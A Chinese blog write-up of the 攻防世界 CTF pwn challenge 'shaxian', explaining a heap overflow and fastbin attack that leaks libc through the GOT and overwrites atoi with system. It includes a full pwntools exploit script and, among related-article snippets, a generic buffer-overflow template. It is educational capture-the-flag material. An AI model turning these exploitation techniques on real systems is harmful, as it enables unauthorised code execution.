攻防世界 pwn 进阶 shaxian

最新推荐文章于 2024-08-28 14:56:41 发布
原创 最新推荐文章于 2024-08-28 14:56:41 发布 · 298 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

该博客详细介绍了如何通过栈溢出漏洞和Fastbin Attack技术,逐步操控程序内存,篡改 GOT 表,最终实现系统命令执行获取 Shell 的过程。涉及到的关键步骤包括:溢出控制指针、泄露函数地址、伪造堆块和利用 atoi GOT 地址执行 system 函数。

保护
在这里插入图片描述
先留下了地址跟电话。
在这里插入图片描述
点餐函数。
在这里插入图片描述结构大概是这样的
在这里插入图片描述然后点餐那里可以溢出

submit
在这里插入图片描述他这很有意思他这个程序记录你不停点餐的方式是在那个空间最后八个字节放进去了bss上地址本来有的东西,然后free之后再给它放回去,就是套娃的样子。但是我们能够溢出啊,我们之间可以控制它最后放在我们那个地方的地址,这不就好起来了嘛?

receipt
在这里插入图片描述

review
在这里插入图片描述
view循环着把东西都输出出来。

那么这道题大致的利用思路是什么,是通过溢出,把结构体最下面的那个指针改成got表的地址,然后就可以达到在输出函数输出的时候打印我们需要的地址。
有了地址之后我们还是利用溢出,从chunk0溢出到chunk1,修改fd,然后利用fastbin_attack,对存放结构体地址的那个地方进行攻击,当然我们需要进行伪造,将结构体地址覆盖成atoi的got表地址,然后改成system函数,从而get shell。

在这里插入图片描述在最后申请到fake_chunk之后通过这些代码来劫持got,利用的非常巧妙,先输入的是内容,把note地方写成atoi的got表地址,然后v0等于note,也就是等于的是atoi的got,然后往里面写many,这个时候你就把many输入的时候写system的地址就行。

#coding:utf8
from pwn import *
 
#r = remote('111.200.241.244',54867)
r = process("./shaxian")
elf = ELF('./shaxian')
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
ptr = 0x804B1C0
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_i386/libc-2.23.so")
#libc = ELF("./32/libc-2.23.so")
context.log_level = "debug"

def add(count,content):
    r.sendlineafter('choose:','1')
    r.sendlineafter('5.Jianjiao',content)
    r.sendlineafter('How many?',count)
 
def delete():
    r.sendlineafter('choose:','2')
 
def show():
    r.sendlineafter('choose:','4')
 
r.sendlineafter('Your Address:','123')
fake_chunk = p32(0) + p32(0x31)
payload = 'd'*(0x100-0x10) + fake_chunk
r.sendlineafter('Your Phone number:',payload)
 
add('1','a') #0
add('1','b') #1
add('1','c') #2
delete()

payload = 'a'*0x20 + p32(puts_got-0x4)
#这里的puts_got - 0x4是因为申请到的空间前四个字节是many,这样就可以把puts_got里面的内容放到content之中。
#当然通过many也可以泄露,因为它输出的时候many也会输出出来。
#prev_size size fd
payload += p32(0) + p32(0x31) + p32(ptr-0x10) #chunk1
add('1',payload)
show()
r.recvuntil('* 1\n')
puts_addr = u32(r.recv(4))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']

print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)

print str(system_addr )
print str(system_addr - 0x100000000)

add('10','b') #chunk1
#申请堆块到ptr上方的假chunk处,将ptr指针覆盖为atoi的got地址,同时修改atoi的got表

add(str(system_addr - 0x100000000),'dddd' + p32(atoi_got))

#这个地方要注意,为什么输入的是地址减0x100000000,而不是直接输入地址就好
#可以试一下,str在转换的时候,把地址直接转换成了无符号整型
#但是在减去一个比自己打的数之后会变成负数
#那么虽然十六进制一样,差别就是你输入的是无符号整形,还是有符号的
#经过调试,atoi函数的核心是strtol函数,strtol函数的核心是strtol_internal
#它在处理无符号整数的时候当这个数字超过它的最大整数0x7fffffff,就会把数字设置成0x7fffffff
#所以在把地址输入无符号整数的话,返回的结果就是0x7fffffff

#getshell
r.sendline('/bin/sh')
 
r.interactive()
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
攻防世界-PWN-shaxian-堆溢出与FastbinAttack
aptx4869_li的博客
07-15 469
攻防世界shaxian题目的解题思路
攻防世界PWNshaxian题解
seaaseesa的博客
02-09 743
shaxian 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 功能1存在溢出 free后没有清空指针 我们先创建链表三个节点,程序使用的是头插法,因此,当我们释放的时候,第一个节点最后释放,而当我们再申请同样大小的块时,由于fastbin的特性,第一个块就先被申请回来了,这样,我们溢出到节点2的结构体,覆盖指针为函数got表,就能泄露信息 #头插法建立链表,c...
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 490
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 623
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该题利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
pwn 进阶(3)
weixin_44113469的博客
02-07 250
0x01 Stack migration leave;ret; leave mov esp,ebp pop ebp ret pop eip if we deploy stack stack bss fake_ebp1 esp–> fake ebp1 mem is here/ fake_ebp2 read fake_fun leave_ret ebp–> fake_ebp2 mem is here control eip return to read fake_e
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 500
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 3221
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 1083
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
攻防世界 pwn进阶pwn-200
Kni9hT's Blog
03-04 1843
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界 Pwn 进阶 第二页
yongbaoii的博客
02-18 854
00 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆。 攻防世界 Pwn 新手 攻防世界 Pwn 进阶 第一页 01 4-ReeHY-main-100 超详细的wp1 超详细的wp2 03 format2 栈迁移的两种作用之一:栈溢出太小,进行栈迁移从而能够写入更多shellcode,进行更多操作。 栈迁移一篇搞定 有个陌生的函数。 C 库函数 void *memcpy(void *str1, const void *str2, size_t n) 从存储区 str2
pwn 进阶(2)
weixin_44113469的博客
02-07 483
pwn improve(2) 0x01 plan1(produce vulnerable program ) my important jop is to Debugger。 pwn1(20200315) this topic is anther lgd,the topic i produced before。 [key point]: 1.heap overlap 2.seccomp 3.rop 4.shellcode wp: there is a heap overlap in the add fun
pwn-进阶-forgot
weixin_45971758的博客
08-19 2262
1.checksec先检查,开启的保护以及程序情况。 开启了NX(地址随机化保护) , 就意味着程序地址分布随机。 32位小段序,输入的变量数据在地址中的存放位置(安装小段序存放)。 2.静态调试(静态查看) 将文件拖入到 ida 32位,然后确定。 shift+F12看到程序出现的字符串,发现下面。 有./flag cat %s , 双击字符串并且看到了在.rodata 的存放位置,后面还有一个函数。 双击此函数,查看函数全部信息。 这样就看到了函数全貌。之后按F5(笔记本电脑键盘FN+F5),查
攻防世界 pwn 进阶 bufoverflow_a
yongbaoii的博客
03-13 539
保护一片绿。 菜单堆。 alloc delete fill show
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 2203
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
菜鸟PWN进阶之堆基础
re1wn
01-04 7197
菜鸟PWN进阶之堆基础
【二进制安全PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
热门推荐
leah126的博客
07-25 1万+
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
PWN-格式化字符串漏洞
GalaxySpaceX的博客
08-28 1520
PWN-格式化字符串漏洞
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2809
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值